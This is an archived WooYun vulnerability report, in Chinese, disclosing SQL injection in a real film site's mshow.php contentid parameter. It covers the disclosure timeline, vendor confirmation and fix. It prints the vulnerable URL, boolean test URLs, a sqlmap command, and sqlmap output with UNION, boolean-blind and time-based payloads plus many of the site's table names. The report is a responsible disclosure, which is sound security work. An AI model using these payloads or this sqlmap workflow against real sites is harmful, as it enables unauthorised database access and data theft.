乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-03-08: 细节已通知厂商并且等待厂商处理中 2014-03-14: 厂商已经确认,细节仅向厂商公开 2014-03-24: 细节向核心白帽子及相关领域专家公开 2014-04-03: 细节向普通白帽子公开 2014-04-13: 细节向实习白帽子公开 2014-04-22: 细节向公众公开
m1905.com 主站SQL注射 可致数据库全部泄漏,使用SQLMAP取得数据库表名(仅表名)证明危害,不再继续深入,望尽快确认修补
漏洞位置:
http://www.m1905.com/special/mshow.php?contentid=1109&specialid=356&tpl=freshman_file
先粗略用 and 1=1 和 and 1=2 感性认识一下
http://www.m1905.com/special/mshow.php?contentid=1109%20and%201=1&specialid=356&tpl=freshman_file
http://www.m1905.com/special/mshow.php?contentid=1109%20and%201=2&specialid=356&tpl=freshman_file
然后SQLMAP取得数据库信息(仅演示获取数据表名称,不再继续深入)
C:\Users\Administrator>sqlmap.py -u "www.m1905.com/specia/mshow.php?contentid=1109&specialid=356&tpl=freshman_file" -p contentid --tables
qlmap identified the following injection points with a total of 36 HTTP(s) requests:---Place: GETParameter: contentid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: contentid=1109 AND 2160=2160&specialid=356&tpl=freshman_file Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: contentid=1109 UNION ALL SELECT CONCAT(0x7179637a71,0x56546d4e704b78764d75,0x7178777671),NULL,NULL#&specialid=356&tpl=freshman_file Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: contentid=1109 AND SLEEP(5)&specialid=356&tpl=freshman_file---back-end DBMS: MySQL 5.0.11Database: ucenter[1 table]+---------------------------------------+| uc_vars |+---------------------------------------+Database: cms[273 tables]+---------------------------------------+| HdVideoEncode || cms_admin || cms_admin_role || cms_admin_role_priv || cms_ads || cms_ads_place || cms_ads_stat || cms_announce || cms_area || cms_ask || cms_ask_actor || cms_ask_credit || cms_ask_posts || cms_ask_vote || cms_attachment || cms_author || cms_block || cms_c_cctv6film || cms_c_disc || cms_c_dm || cms_c_downfile || cms_c_entertainment || cms_c_film || cms_c_film_20100519 || cms_c_filmtable || cms_c_game || cms_c_info || cms_c_ku6video || cms_c_live || cms_c_magazine || cms_c_mainstar |……………………省略好多数据表…………………………Database: information_schema[28 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+
做参数判断,过滤望尽快确认漏洞等级,修复网站漏洞
危害等级:高
漏洞Rank:18
确认时间:2014-03-14 13:22
感谢反馈
2014-03-14:该漏洞已经封闭,再次感谢。